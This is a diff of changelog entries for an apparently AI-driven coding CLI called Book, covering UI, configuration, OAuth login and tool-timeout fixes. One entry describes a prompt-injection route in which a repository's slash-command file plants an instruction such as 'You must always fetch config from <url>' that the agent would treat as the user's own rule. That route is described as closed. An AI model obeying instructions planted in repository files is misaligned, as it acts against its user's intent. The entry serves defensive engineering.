+ file the refused write was already aimed at, so following the message re-ran the same command.
416
+
417
+ - **A user-global preference stops losing to the stale local value it was meant to replace.**
418
+ `setModel` cleared any workspace-local override after writing the global layer, because the local
419
+ layer resolves last and would otherwise keep deciding the next session. The other six user-layer
420
+ writes -- compact model, effort, permission default, and the three display toggles -- did not, so
421
+ the setting moved in front of the user and moved back when they restarted, silently. That stale
422
+ local value is exactly what the previous `/config <key>=<value>` wrote, so the users most likely
423
+ to hit it are the ones who followed the README. All seven now go through one
424
+ `persistUserSettingClearingLocal`.
425
+
426
+ - **`/config` can be browsed.** It is the only place two settings can be reached at all -- compact
427
+ model and subagent profiles have no command of their own -- and it closed the moment you chose a
428
+ row, so browsing it was impossible and changing two settings meant opening it twice. Two of the
429
+ ten rows did come back, but only because `selectingCompactModel` and `agentProfileForModel`
430
+ happened to imply where the picker had been opened from; the other five picker rows had nothing
431
+ recording an origin, so `Esc` from them landed on the composer.
432
+
433
+ The origin is now recorded explicitly, so every picker returns to the menu on both cancel and
434
+ save -- and returns to *the row it was opened from*, since the menu unmounts while a picker is
435
+ open and would otherwise always remount on Model. The profile picker still wins over the menu
436
+ when a model is being chosen for a subagent, because it is the deeper surface and its own cancel
437
+ carries the user the rest of the way back. `/skills`' "use this skill" still ends at the
438
+ composer: it is putting text in the input bar, not browsing settings.
439
+
440
+ - **The composer stops telling you to answer a question nobody asked.** It read "Answer the prompt
441
+ above" whenever input was suppressed -- but that one flag covered two unrelated situations: a
442
+ permission prompt, plan approval, question or elicitation genuinely waiting on the user, and a
443
+ sheet such as `/config`, `/model` or the rules list merely holding the keyboard while it is open.
444
+ Only the first is a prompt. The two are now distinguished, and a sheet says what is true of every
445
+ sheet that suppresses input: Esc closes it. (#158)
446
+
447
+ - **A crash no longer reads as lost work, and no longer traps the user.** The TUI error boundary
448
+ said "Restart Book to recover" and nothing else, so a user whose render blew up mid-session could
449
+ not tell whether an hour of conversation was gone. It was never gone -- `SessionStore.create`
450
+ appends the session header synchronously at startup and every record after it lands the same way
451
+ -- so the box now names the command that reopens the session. It omits that line when persistence
452
+ is off, and when the session holds nothing but its own header, because reopening an empty
453
+ conversation is not the reassurance it sounds like.
454
+
455
+ The box also owns its own keyboard. It could not borrow the app's: that handler stays mounted
456
+ with whatever state it held when the render blew up, so it swallowed Ctrl+C behind its modal
457
+ guard whenever a picker was open and spent it on `interrupt()` whenever a turn was streaming --
458
+ and with Ink's `exitOnCtrlC` disabled and no SIGINT handler behind it, nothing else would have
459
+ exited either. Ctrl+C now leaves through the normal session-end path from any crash, and R
460
+ retries the render, which recovers the many throws that are transient rather than costing the
461
+ user the whole process.
462
+
463
+ The `console.warn` that printed the same message as raw text above the alternate screen is gone:
464
+ it duplicated the box and smeared the frame. Its diagnostic value is replaced rather than
465
+ dropped -- the box now carries the throw site, since `uiLog` is a no-op unless `BOOK_DEBUG` is
466
+ set and so cannot be the only record a bug report is built from.
467
+
468
+ - **Two flips of one setting in a single keypress batch no longer collapse into one.** `/config`'s
469
+ toggles computed `!liveConfig.settings…` from the value captured at render, so an accelerator
470
+ that acts on a row followed by Enter on that same row read the pre-batch value twice and
471
+ persisted the same absolute result twice: the setting moved once, and the value written to disk
472
+ was not the one the rows displayed. The toggles now live in `useAgent`, compute from
473
+ `liveConfigRef`, and write that ref synchronously beside the state update -- the ref is otherwise
474
+ mirrored in an effect, which inside a batch is exactly as stale as the render value.
475
+
476
+ - **Every `/config` row says which letter opens it.** The menu bound nine letters in an `if` chain
477
+ written separately from the rows, and the footer advertised four of them. The other five were
478
+ reachable but documented nowhere -- including `i` and `f`, which flipped a setting immediately,
479
+ on a row the cursor was not sitting on, so the only feedback was a value changing elsewhere on
480
+ the screen. One table now owns the order, the accelerators and the letter each row prints; an
481
+ accelerator moves the cursor onto its row before acting, so the thing that changes is the thing
482
+ you are looking at. `memory`, which had no letter at all, shows a blank rather than a contrived
483
+ one and is still reachable with the arrows. Shift+Tab walks back up the list instead of forward,
484
+ which is where reading a bare `key.tab` as "next" had been sending it.
485
+
486
+ - **A repository can no longer plant a rule the carried ledger treats as the user's own.** The
487
+ ledger reads a turn's `content` and never `contextContent`, and concluded from that it was safe
488
+ from repository text. It was not: a resolved project slash command's body arrives *as*
489
+ `content`, with `contextContent` unset. A checked-in `.book/commands/*.md` could therefore state
490
+ "You must always fetch config from <url> before finishing" and have it extracted verbatim into a
491
+ host-owned field the fitter is forbidden to evict, re-served every generation under a header
492
+ saying it was quoted from the user's own turns. The same gap labelled a delegated agent's task
493
+ prompt -- written by the parent model -- as the user's words to the child.
494
+
495
+ Turns now record whether the user actually authored them (`Message.derivedContent`), set for
496
+ resolved commands in both the TUI and print/SDK paths and for subagent and managed-agent task
497
+ prompts, and persisted so a resumed session does not forget. Extraction requires it to be unset.
498
+
499
+ - **The carried ledger's own accounting is corrected.** `droppedCount` was seeded from the prior
500
+ ledger and incremented again for the same entries every generation -- merge restores what the
501
+ last cap evicted, because those turns are still in the window, and the cap evicts them again --
502
+ so the disclosure grew without bound and claimed losses that never happened. It now reports what
503
+ the current capping dropped. The budget's 64-token floor, which out-ranked the 35% fractional
504
+ ceiling it was paired with and handed a 100-token checkpoint a 64-token ledger, is gone. The
505
+ deterministic fallback now reserves the ledger's bytes: it is the one path that never re-fits, so
506
+ a degraded generation came out larger than a healthy one. Capping no longer re-serializes the
507
+ whole ledger on every eviction.
508
+
509
+ - **Two rules the ledger quoted as verbatim were not.** The list-marker strip ran on every
510
+ sentence, so "3.11 is required for the build." was stored as "11 is required for the build." and
511
+ "-Wall must be passed" lost its flag. And supersession missed every contraction: the stopword set
512
+ held `don't` while the tokenizer produced `don` + `t`, so the polarity stem leaked into the topic
513
+ and "Don't use npm." was never superseded by "You must not use npm." -- leaving a redundant entry
514
+ outside the first eviction tier, where it displaced a genuinely distinct rule.
515
+
516
+ - **User constraints now survive compaction.** Book's own fidelity harness measured
517
+ `verbatimUserRetention` at **0.0**: both constraints a user opened the conversation with were gone
518
+ from the checkpoint after a single generation. They lived in model-authored episodes, and the
519
+ fitter evicts completed episodes oldest-first -- so the oldest thing in a coding session, the
520
+ brief, was the first thing dropped. A new host-owned **Carried Ledger**
521
+ (`src/agent/carried-ledger.ts`) splits authorship: directive sentences from the user's own turns
522
+ are extracted verbatim into a `carried` field on `ConversationCheckpointV2` that the reducer may
523
+ read but never write (a model-supplied `carried` is discarded) and that `fitCheckpoint` may not
524
+ evict. It grows monotonically and never reorders, so ledger position is chronology, and the
525
+ checkpoint message now states the reading rule: later entries win where two conflict. Because an
526
+ un-evictable field is just the overflow moved one level down, it carries its own cap -- 32
527
+ entries, 1024 tokens, at most 35% of the checkpoint budget, evicting superseded entries first,
528
+ then weak steers, then strong rules, never the newest, and disclosing anything dropped.
529
+ Extraction reads only what the user typed, never `@file` expansions or shell output, so nothing a
530
+ repository controls can plant a rule there, and text that looks like a secret is refused. Measured
531
+ over the same eight generations: `verbatimUserRetention` 0.0 -> 1.0, overall retention 0.333 ->
532
+ 0.667, for no extra reducer calls. The design is written down in `plans/carried-ledger-plan.md`,
533
+ which previously existed only as references in code comments.
534
+
535
+ - **`book config set` now writes the user-global layer by default, so a setting follows you instead
536
+ of the directory you happened to be in.** It previously wrote `<workspace>/.book/settings.local.json`
537
+ unconditionally, with no way to ask for another layer: the same preference had to be re-set in
538
+ every checkout, and because the local layer resolves *last*, a stray value left in one silently
539
+ outranked a later deliberate one. `--project` and `--local` reach the two workspace layers,
540
+ `-g`/`--global` states the new default explicitly, and more than one scope is an error. A
541
+ user-global write that a workspace layer still shadows now reports it rather than looking inert.
542
+
543
+ - **TUI preferences are saved by whose choice they are.** Effort, compact model, thinking display,
544
+ startup animation, and memory auto-capture moved from the project-local layer to the user-global
545
+ one, joining model, provider registries, API keys, and the permission default mode. Skill
546
+ overrides, approved permission rules, per-profile agent models, and the theme stay project-local:
547
+ those are about the repository, and a theme name can come from a project's `.book/themes`, where
548
+ it would not resolve elsewhere.
549
+
550
+ - **`book config set`, the `/config` slash command, and the TUI's local persistence share one list
551
+ of settings a workspace file may not carry.** The `experimental.*` guard existed in all three;
552
+ the `auth.*` guard was added to only one, so `/config auth.profile=codex` wrote a value the
553
+ loader strips and reported success. Both now come from `blockedWorkspaceSettingPath`.
554
+
555
+ - **`book doctor` names the credential that will actually be used.** It reported
556
+ `Credentials: resolved` whenever an API key was present, which points at the wrong credential once
557
+ an auth profile is active - the transports replace the key headers outright. It now reports the
558
+ active profile, its account label, and its token expiry - through the same renderer
559
+ `book auth status` uses, so the two commands cannot disagree about whether a credential is still
560
+ good - or tells the user to run `book auth login <profile>` when the selected profile has nothing
561
+ stored. An unreadable credential store is reported as such rather than as "nothing is logged in",
562
+ which was a dead end: `book auth login` also refuses to write a store it cannot parse.
563
+
564
+ - **The 401 message names commands that exist.** It said "Check BOOK_API_KEY or run `/login`" -
565
+ `/login` was never a Book slash command, and BOOK_API_KEY is the wrong thing to look at once a
566
+ subscription profile is active.
567
+
568
+ ### Added
569
+
570
+ - **`book status` reports whether a run is alive, and how it ended.** Book has been writing a
571
+ liveness record to `<BOOK_HOME>/runs/<session-id>.json` at every turn boundary -- pid, turn,
572
+ elapsed, spend against budget, current todo, last tool, free disk, and a terminal or crash outcome
573
+ -- and nothing outside its own test read it. `book status` reported objective, history, tokens,
574
+ cost, and todos from the session JSONL, and so could not answer whether the process was alive,
575
+ which turn it was on, or whether it finished cleanly. A 20-minute print run that completed its work
576
+ correctly and one that died at turn 16 on a stalled stream looked identical from outside; the only
577
+ way to tell them apart was `jq` on a file with no documented reader.
578
+
579
+ The record is now folded into `book status`, which already existed, needs no credentials, and is
580
+ the surface a person looks at. The headline is one of four: `running` when the pid answers,
581
+ `finished` with the terminal status and reason, `crashed` when the process died recording no
582
+ outcome, and -- the case the record exists for -- *no longer running, and recorded no outcome*. A
583
+ live process that has not reached a turn boundary in fifteen minutes is named as possibly wedged,
584
+ since a transcript's mtime advances at the same rate for a healthy run and one stuck on a
585
+ permission prompt. `--json` carries the same fields under `run`.
586
+
587
+ - **`book config unset <key>`** removes a key from one layer, so a shadowing value can be cleared
588
+ with the tool that reported it rather than by hand.
589
+
590
+ - **`book config get`/`list` take a scope.** Without one they still report the resolved merge;
591
+ with `--global`, `--project`, or `--local` they read that single file verbatim, which is what
592
+ answers "why is this not the value I set".
593
+
594
+ - **Subscription authentication (`book auth login | logout | status`).** Book can now authenticate
595
+ with a provider subscription over OAuth instead of an API key, through two built-in profiles:
596
+ `anthropic` (Anthropic transport) and `codex` (OpenAI-compatible transport). The flow is
597
+ authorization-code with PKCE (S256) and a CSRF `state`, against a listener bound to `127.0.0.1`
598
+ only that serves exactly one matching callback; a mismatched callback is refused and the flow
599
+ keeps waiting for the real one. `--manual` skips the listener entirely and takes the redirect URL
600
+ pasted back, which is the flow that works when the browser is on a different machine from the CLI.
601
+
602
+ **Book bundles no vendor client ids.** A client id identifies which application an authorization
603
+ server releases a subscription token to, so shipping a vendor's first-party id would make every
604
+ Book user appear to that vendor as that vendor's own official CLI. The id is configuration -
605
+ `BOOK_AUTH_CLIENT_ID_<PROFILE>` or `auth.profiles.<id>.clientId` - and `book auth login` stops
606
+ with both of those lines, before it opens a browser or binds a port, when none is set.
607
+
608
+ Tokens live in `<BOOK_HOME>/auth.json` at mode `0600`, never in a workspace: a repository can
609
+ force-add a tracked `.book/settings.local.json` into a clone, so nothing a repository controls may
610
+ reach an account credential. The `auth` settings block is held to the same rule and read only from
611
+ a trusted source - `<BOOK_HOME>/settings.json`, an explicit `--settings` file, or the environment.
612
+ Every field in it decides where an account-wide token is obtained or sent (`profiles.<id>.baseUrl`
613
+ is the host that receives the Authorization header on every request), so both workspace layers are
614
+ stripped and `book config set auth.…` refuses rather than writing where it would be ignored. Reads fail closed and writes refuse a store they could not parse,
615
+ rather than silently discarding a refresh token. Endpoints, scopes, redirect, base URL, default
616
+ model, and headers are all overridable per profile, and a wholly new profile needs only
617
+ `authorizeUrl`, `tokenUrl`, and `baseUrl` - enough to point Book at a self-hosted authorization
618
+ server without a fork.
619
+
620
+ **The credential is bound to its profile's origin**, enforced where the request header is built
621
+ rather than at each place a base URL can change. `BOOK_BASE_URL`, a `provider.<id>` entry, and a
622
+ legacy `.bookrc.json` can all retarget a request after the profile was selected - and
623
+ `.bookrc.json` is repository-controlled and covered by no settings trust layer - so guarding the
624
+ settings keys alone left the token reachable by a cloned repository. A mismatch is refused with a
625
+ message naming the override that caused it. Selecting a model through a configured
626
+ `provider/<id>` entry additionally drops the profile, since that entry brings its own endpoint
627
+ and key; such an entry no longer inherits the profile's endpoint either, which would have posted
628
+ the entry's own API key to the subscription vendor.
629
+
630
+ The login listener refuses any callback that cannot prove it belongs to the flow *before* it
631
+ honours an `error` parameter, so a bare `<img src=".../callback?error=x">` on a page the user
632
+ happens to visit can no longer kill a login in progress; reflected error text is HTML-escaped and
633
+ the page carries a `default-src 'none'` CSP. The redirect names `127.0.0.1` rather than
634
+ `localhost` (RFC 8252 §7.3), matching the address the listener actually binds. A shared token
635
+ refresh carries no caller's AbortSignal, so cancelling one turn no longer fails the parallel
636
+ subagents awaiting the same refresh; a refresh response that omits `expires_in` or `scope` keeps
637
+ the stored values rather than overwriting them with undefined, and `expires_in` is accepted as a
638
+ numeric string. Losing a cross-process refresh race re-reads the store and uses the token the
639
+ other process wrote instead of demanding a fresh login. Confidential clients
640
+ (`auth.profiles.<id>.clientSecret`, `BOOK_AUTH_CLIENT_SECRET_<PROFILE>`) are supported for
641
+ self-hosted authorization servers that issue no public clients.
642
+
643
+ Which credential a run spends is resolved once, at config load. An explicit `BOOK_AUTH_PROFILE` or
644
+ `auth.profile` wins (`api-key` pins the run to key auth); otherwise a stored credential is used
645
+ only when no API key resolved *and* exactly one credential matches the active provider - so adding
646
+ a login never silently retargets a workspace that already had a working key. An active profile
647
+ supplies the API base and a default model, and the transports send `Authorization: Bearer <token>`
648
+ *instead of* the API-key header rather than alongside it, which Anthropic rejects. Access tokens
649
+ refresh roughly two minutes before expiry, once per profile even across parallel subagents, and are
650
+ written back so concurrent `book` processes see them. With no profile active, both transports send
651
+ byte-identical headers to what they sent before.
652
+
653
+ ### Fixed
654
+
655
+ - **The question wizard answers the question you are looking at, and only that one.** The batch
656
+ fix below made the wizard's cursor and question index safe against two keys arriving in one
657
+ stdin chunk, but the helpers those handlers called still looked the question up during render.
658
+ So back plus Enter, delivered together, recorded the answer against the question the user had
659
+ just left. Fixing that exposed a second owner of the Enter key: the custom-answer editor
660
+ submitted through its text input *and* the wizard's own handler saw the same keypress, and once
661
+ the mode flag was batch-safe the second listener read it already flipped and answered the next
662
+ question with its first option before it was ever shown. A pasted Enter, Down, Enter did the
663
+ same through the still-mounted text input, re-submitting the typed text against whichever
664
+ question the index had reached. The wizard now owns Enter in the editor outright, and every
665
+ helper resolves the question from its index rather than from render state.
666
+
667
+ Three smaller defects went with it. A custom answer that spelled an option's label was sent
668
+ beside the toggled label, which the host rejects as a duplicate and drops every answer in the
669
+ request; it now selects the option instead. A question the model happened to call
670
+ `constructor` read an inherited function where an array was expected and wedged the session in
671
+ the error screen; answers are keyed by question index now. And quick-choose accepted anything
672
+ `Number()` would coerce, so a pasted line beginning `" 1"` chose option 1.
673
+
674
+ #167 called the BYOK wizard's version of this latent. It was not: Space, Down, Enter in one
675
+ chunk deselected the last model and still passed the "select at least one" guard, persisting a
676
+ provider whose only model id was empty; arrow plus Enter on the source step discovered models
677
+ from an endpoint the user had just said has no model list; a filter character batched with
678
+ Down and Space toggled a model the filter then hid; and two arrows on the protocol step toggled
679
+ it once. Every value that wizard's handler reads back is batch-safe now, except the step itself,
680
+ which has to stay plain so a text field's Enter is not dispatched twice — the same reason the
681
+ elicitation form keeps its editing flag plain.
682
+
683
+ - **A clock correction no longer breaks a run's timeouts in both directions.** Every duration Book
684
+ decided — how long to keep retrying a failing provider, how long to wait for a background shell
685
+ to start or stop, how long to let the evidence ledger flush, how long the run has been going as
686
+ the model is told it — was measured by subtracting two readings of `Date.now()`. That is the
687
+ settable wall clock. NTP steps it, a resumed VM corrects it, an operator fixes a drifted host,
688
+ and none of that matters over a five-minute chat.
689
+
690
+ Over the multi-day runs Book is built for it matters twice, in opposite directions. A backwards
691
+ correction makes elapsed time *negative*, so a retry budget can never be exhausted and a provider
692
+ outage becomes an unbounded retry storm — measured at 51 attempts against a budget that allowed
693
+ well under ten. A forwards correction exhausts the same budget instantly, abandoning a call that
694
+ was about to succeed. Both are now measured against a monotonic clock (`src/clock.ts`), which no
695
+ adjustment can move.
696
+
697
+ **Timestamps are unchanged, deliberately.** Anything written to a file, shown on screen, or
698
+ compared against a stamp another process wrote is still wall-clock — including `Retry-After`,
699
+ which is an HTTP date and could not be anything else. Cross-process liveness stays there too, and
700
+ not by oversight: two processes share no monotonic origin, so a monotonic reading cannot cross
701
+ that boundary at all. `MILESTONES.md` records what that leaves open and what would actually fix
702
+ it, and each such call site now says so where it reads the clock.
703
+
704
+ - **Two dialogs now name the keys they actually accept.** `/model` binds six Alt-chords and
705
+ described them with four hand-written sentences picked by two booleans, which left holes.
706
+ `Alt+E` — set a model's effort — was advertised nowhere in the TUI at all: the row it opens
707
+ (`Effort [high] ← → adjust`) only appears once you have already guessed the key. And `Alt+S`,
708
+ use for this session, vanished whenever a removable BYOK provider existed, because that sentence
709
+ spent its line on `Alt+A` and `Alt+D` instead — the chord that always works was hidden by the
710
+ presence of one that sometimes does. The footer is now built from what is live, so a chord
711
+ cannot be advertised when it will not fire, or dropped because a different one appeared.
712
+
713
+ `/skills` listed eight chords on one line that did not fit, so Ink wrapped it — and the wrap
714
+ landed after a separator, leaving `Esc close` alone on a second line under a dangling `·`. Both
715
+ footers are now split deliberately, by what the keys act on.
716
+
717
+ - **`/resume` can reach every conversation, page, and be typed at.** It drew twelve rows while
718
+ its cursor wrapped over every session in the workspace, so in a workspace with more than twelve
719
+ the thirteenth arrow press moved the highlight onto a row that was not on screen — the list
720
+ showed no selection at all, and Enter resumed a conversation the user had never seen. It
721
+ windows now, pages with PgUp/PgDn, and filters as you type; it is the one list long enough to
722
+ need all three.
723
+
724
+ That fix came out of extracting the list dialog six pickers were each rebuilding — theme,
725
+ permission mode, effort, resume, subagent profiles and login. Along with the cut list, the copies
726
+ had drifted in two smaller ways: `/login` still marked its selection with `❯` after the rest of
727
+ the TUI had settled on `›`, and Esc was described four different ways depending on which dialog
728
+ was open. Paging is new to all six. The shared cursor is also batch-safe by construction, so a
729
+ picker cannot reacquire the defect fixed below by being written next.
730
+
731
+ `/model`, `/skills` and `/rewind` deliberately keep their own implementations — filtering with a
732
+ removal mode, search with multi-action rows, and a two-stage flow that has to complete from a
733
+ single input chunk.
734
+
735
+ - **A trust gate no longer confirms the button you moved off.** Ink hands a whole chunk of stdin
736
+ to its handlers in one go, and React batches every state update made while that runs — so two
737
+ keys that arrive together (a paste, an arrow repeating faster than a frame, input buffered over
738
+ a slow link) reached a handler that read its cursor back from render state and still saw the row
739
+ before the first key. The plan approval card approved a plan aimed at reject, and the MCP server
740
+ prompt connected a server aimed at reject. Both persist their answer, and both exist precisely
741
+ so the choice is deliberate.
742
+
743
+ Five more surfaces had the same read-back: the skill manager wrote activation and consent to the
744
+ wrong skill, the question wizard answered with the wrong option, the elicitation form sent itself
745
+ when an arrow left the send row, the effort picker saved the wrong level, and the BYOK wizard
746
+ toggled the wrong model. All of them now read the cursor through the batch-safe hook the pickers
747
+ already use. The effort picker is worth naming separately: it wrote its ref inside a state
748
+ updater, which looks safe and is not, because React evaluates only the *first* update in a batch
749
+ eagerly — so it went wrong from the second key onward while a one-key test passed.
750
+
751
+ - **The armed permission button is marked, and one glyph means "selected" everywhere.** The
752
+ permission card carried its armed choice in background colour and bold alone — the only
753
+ selection surface in the TUI without a glyph, while every menu, picker and wizard has one. A
754
+ low-contrast theme or a colour-blind reader had nothing left to read, and the gap widened when
755
+ `A` became the key that *arms* "Always allow" and then steps its scope rather than firing it:
756
+ the whole interaction now depends on seeing which button is armed. It uses the same `▸` the plan
757
+ approval card uses, and drops its brackets — a marker and a pair of brackets are two containers
758
+ doing one job, and the columns go to the rule pattern instead. Elsewhere, three components spelled
759
+ the selection marker `❯` while nineteen spelled it `›`; they all say `›` now, including the two
760
+ text-input carets, which matches the composer's own prompt.
761
+
762
+ The shortcut reference also said Esc only cancels a permission or aborts the stream. It closes
763
+ the open panel too.
764
+
765
+ - **A command in the `/` menu says what it does before how it is spelled.** Three things competed
766
+ for one line. The argument syntax sat between the name and the description, so at 80 columns
767
+ `/agent` read ``/agent <id>|send <id> <message>|stop <id> [Built-in] — Inspec…`` — the grammar of
768
+ the command in full, and then its meaning truncated away. `[Built-in]` repeated down every row of
769
+ a list that was entirely built-ins. And the whole row was one colour, so a name did not stand out
770
+ from its own description. Now the description always follows the name, the syntax appears only on
771
+ the selected row (the list is for finding a command; the syntax matters once you have found it),
772
+ the badge appears only when the list actually mixes categories, and the name, syntax, badge and
773
+ description each carry their own colour. The syntax is dropped rather than allowed to starve the
774
+ description on a narrow terminal.
775
+
776
+ - **A narrow status line shortens the branch last, not first.** At 56 columns it cut
777
+ `research/next-task` to `research/ne…` and left `scripted/scripted` whole. Both are identity, but
778
+ the branch is the one that changes under you — a rebase or a checkout in a sibling worktree moves
779
+ it without asking, while the model stays where you put it. The branch now gets the wider budget.
780
+ Both shrink together rather than one taking the row: packing is first-fit and skips what will not
781
+ fit, so a branch budget generous enough to crowd the model drops the model entirely instead of
782
+ shortening it.
783
+
784
+ - **A code block's language label sits on the block's rail.** It rendered as a bare dim word at the
785
+ prose indent with nothing joining it to the code below, so `js` read as a one-word paragraph in
786
+ the answer — as if the model had said it. It now shares the left rail the block already draws, so
787
+ it reads as a caption on the block.
788
+
789
+ - **"Always allow" is worth pressing, and a rule can be taken back.** For a shell command the rule
790
+ it wrote was the exact command string, so `Bash(npm run check)` matched that byte sequence and
791
+ nothing else: a user who pressed it to stop being asked was asked again on the very next call.
792
+ `A` now arms the button and each further `A` widens the rule it will write — `Bash(npm run *)`,
793
+ then `Bash(npm *)` — wrapping back to the exact one, with the pattern on the button and a caption
794
+ when the scope is broader than the command. Nothing is committed until Enter. Book declines to
795
+ offer a widening for a command that already chains or redirects (`&&`, `|`, `>`, backticks, `$`),
796
+ because `*` crosses those and the user would be generalizing from an example whose shape they
797
+ cannot see repeated. The chosen rule travels with the decision (`PermissionDecision`), so the
798
+ loop persists what the user picked instead of re-deriving the exact one; approvers that cannot
799
+ widen a scope keep returning the bare result.
800
+
801
+ `/permissions` was a static list captioned "add via the Always allow option at tool prompts" —
802
+ accurate, and the whole problem: a rule went in on one keystroke and came out only by
803
+ hand-editing `.book/settings.local.json`, since `book config unset permissions.allow` drops the
804
+ whole list. It now selects with the arrows and removes with `x`, reports when a rule comes from a
805
+ layer it cannot write, and takes the keyboard while it is open so the arrows do not also scrub
806
+ input history.
807
+
808
+ - **The composer has terminal editing keys again.** It dropped every Ctrl chord, so Ctrl+A, Ctrl+E,
809
+ Ctrl+W, Ctrl+K and Alt+Backspace all did nothing and fixing a typo halfway through a long prompt
810
+ meant holding Backspace — slower still in a language where one character takes several keystrokes
811
+ to compose. Ctrl+U, which reads as "clear the line" in every shell, scrolled the transcript
812
+ instead. All of them now edit the prompt, and Ctrl+Y puts back the last deletion, so the three
813
+ kill keys arrive with their undo rather than after it. Ctrl+E and Ctrl+U keep their transcript
814
+ meanings when the prompt is empty — expanding a tool and scrolling are things you do while
815
+ reading, not while composing — and the shortcut reference says so.
816
+
817
+ - **A single stray letter no longer grants a permanent shell permission.** While a permission
818
+ prompt was open the composer still read `Type a follow-up; Enter queues it`, but the prompt owned
819
+ the keyboard and `A` resolved it as *Always allow*. Typing one `a` therefore ran the command and
820
+ wrote a rule such as `Bash(echo one)` into `.book/settings.local.json` — the letter never appeared
821
+ in the composer, nothing was reported, and nothing in the UI removes a rule once written. The
822
+ composer now says `Answer the prompt above` whenever a modal owns the keyboard, `A` only *arms*
823
+ Always allow and takes a deliberate Enter to grant, and Space no longer activates the selection
824
+ (it left `always` two ordinary keystrokes away — `a` then a space). `R` and `S` keep their
825
+ single-key shortcuts. Enter now reads the armed button from a ref, so `A`-then-Enter in one React
826
+ batch can no longer resolve as the previously selected button.
827
+
828
+ - **`Ctrl+/` opens the keyboard-shortcut reference again.** A terminal sends US (`0x1f`) for that
829
+ chord and Ink's `parseKeypress` reports it as `{ name: '', ctrl: false }`, so the
830
+ `key.ctrl && input === '/'` test never matched — while a unit test synthesizing `{ ctrl: true }`
831
+ passed. The one shortcut advertised on the welcome screen could not be pressed, and the README
832
+ documents no other keyboard reference. `isShortcutsToggleKey` now matches the raw byte and keeps
833
+ the flag form for terminals that do report it.
834
+
835
+ - **Reference panels close, and only one opens at a time.** `/help`, `/status`, `/permissions` and
836
+ the shortcut overlay were four independent booleans that nothing but retyping the command could
837
+ clear, so `/help` then `/status` pinned 43 rows of chrome above the composer and pushed the
838
+ conversation off a 40-row terminal. They now share one slot, Esc closes the open one when nothing
839
+ is in flight (a running turn keeps Esc), and each title row states `Esc to close` — on the title
840
+ rather than a footer, because `/help` already runs taller than a short terminal.
841
+
842
+ - **Book can run its own gate.** A foreground `Bash` command was killed at 120s with no way for the
843
+ model to ask for more, so `npm run check` — the gate `CLAUDE.md` tells Book to run before calling
844
+ work done — could never finish. It takes over 200s here; `npm run test:unit` alone takes 158s.
845
+ The default is now 300s, the model can raise it per call up to 600s with `timeout`, and
846
+ `BOOK_TOOL_TIMEOUT_MS` reaches `Bash` as the README always claimed it did.
847
+
848
+ Three things had to change together. `timeout` was read by both the registry and the shell but
849
+ published in neither's schema — it was classed as a host control and hidden — so a model reading
850
+ the `Bash` schema could not know it existed. Across one 49-call print run the model sent
851
+ `["command"]` 48 times and once reached for `max_runtime_ms`, the only runtime knob on offer,
852
+ which applies to background commands only. `timeout` is now declared on `Bash`, with its default
853
+ and ceiling in the description; it stays hidden everywhere else.
854
+
855
+ `src/tools/shell.ts` also never consulted `ctx.env`, so raising `BOOK_TOOL_TIMEOUT_MS` lifted the
856
+ registry's budget while `Bash` still self-killed at its own module constant. Both now resolve one
857
+ deadline from one place, in one order: the call's `timeout`, then the operator's
858
+ `BOOK_TOOL_TIMEOUT_MS`, then the tool's own default. Where an operator has set that variable it is
859
+ also the ceiling on what a single call may ask for: lowering it to 30s caps a model that asks for
860
+ ten minutes, and a request above the limit in force is refused rather than quietly shrunk, since
861
+ a silent clamp is the same "believed it raised a deadline it did not" failure in another place.
862
+ Raising the variable raises the *default*, which needs no argument to reach; it cannot lift the
863
+ per-call reach above the 600000ms the schema publishes, because a ceiling the model is told about
864
+ and then rejected for using is a guaranteed retry loop. Values that a timer cannot hold no longer
865
+ reach `setTimeout` from any source — Node rewrites a delay past 2^31-1 to **1ms**, so an operator
866
+ writing 3000000000 for "effectively no limit" would have had every command killed instantly, and
867
+ `max_runtime_ms` had no guard at all, turning a 30-day background job into one killed at startup.
868
+ Because `Bash` now publishes `timeout` it is also validated like any other argument instead of
869
+ being dropped: `timeout: "10 minutes"` is an error, not a silently ignored value.
870
+
871
+ A tool's `timeout` argument only sets the host budget when the tool publishes one. Honouring a
872
+ stray value everywhere let it shrink the backstop under a tool that times itself — a `Check` call
873
+ carrying `timeout: 5000` got a 15s budget against its own 600s deadline, reinstating the race
874
+ this resolver exists to prevent — and turned an MCP tool whose own `timeout` means seconds into a
875
+ 30ms deadline. Relatedly, `agents.checkTimeoutMs` now outranks `BOOK_TOOL_TIMEOUT_MS`: it is a
876
+ deliberate statement about one suite, and a blanket variable exported for unrelated tuning should
877
+ not cut a 40-minute suite to two minutes.
878
+
879
+ Two neighbours had the same race and are fixed with the same mechanism. `Check` builds a
880
+ deliberate `check_timed_out` result saying the suite was killed rather than failed — the
881
+ distinction a completion gate depends on — and its 120s deadline sat exactly on the registry's,
882
+ so that result was being discarded; its deadline comes from `agents.checkTimeoutMs`, so the
883
+ declaration is resolved per call rather than fixed. `WebFetch` self-clamps at 120s and collided
884
+ at the same point. `Bash` no longer treats `timeout` as a legacy alias for `max_runtime_ms` on a
885
+ background call, which was harmless only while the argument was invisible: now that the schema
886
+ advertises it, honouring it there would put a kill timer on the very job the model backgrounded
887
+ to escape one.
888
+
889
+ The reason nothing came back was a race, not a buffering accident. Both deadlines were 120000ms,
890
+ and the registry arms its timer before `tool.execute` is reached, so at equal values it always
891
+ fired first and answered with its own contentless `tool_timeout`. The shell's partial-output path
892
+ had been unreachable in practice. A tool that enforces its own deadline now declares `timeoutMs`
893
+ and the registry adds a grace margin on top, leaving the tool's report — which carries what the
894
+ command actually printed — the one that wins.
895
+
896
+ What the model receives is now a killed command rather than a failed one, on both streams:
897
+ stderr was being dropped, and for a build that dies mid-run that is usually where the only clue
898
+ is. The two are labelled rather than concatenated, since they are written on independent
899
+ schedules and gluing them together presents a sequence that never happened. The result is built
900
+ after the process tree is torn down *and* the pipes have drained — on POSIX the teardown only
901
+ confirms the process group is gone, so without the second wait the last chunk a batching runner
902
+ flushed on its way out could still be in flight. The distinction is not cosmetic — retrying a
903
+ killed command identically is pointless, retrying with a larger `timeout` is not — so the message
904
+ names the deadline it hit and the remediation names the ways past it, naming the effective
905
+ ceiling rather than a number the operator's own limit has already ruled out. When such a result
906
+ is too large for the model-facing budget it is clipped from the **head**, keeping the tail: a
907
+ killed build is judged on the step it was on when the deadline hit, and head-clipping returned
908
+ install noise while dropping exactly the progress the report exists to deliver. That clip happens
909
+ in `boundToolResultOutput`, which is where every result the agent loop produces is bounded and
910
+ where the output of an oversized failure is folded into the error message — the transcript row is
911
+ clipped the same way, so what the model reads and what the user sees agree.
912
+
913
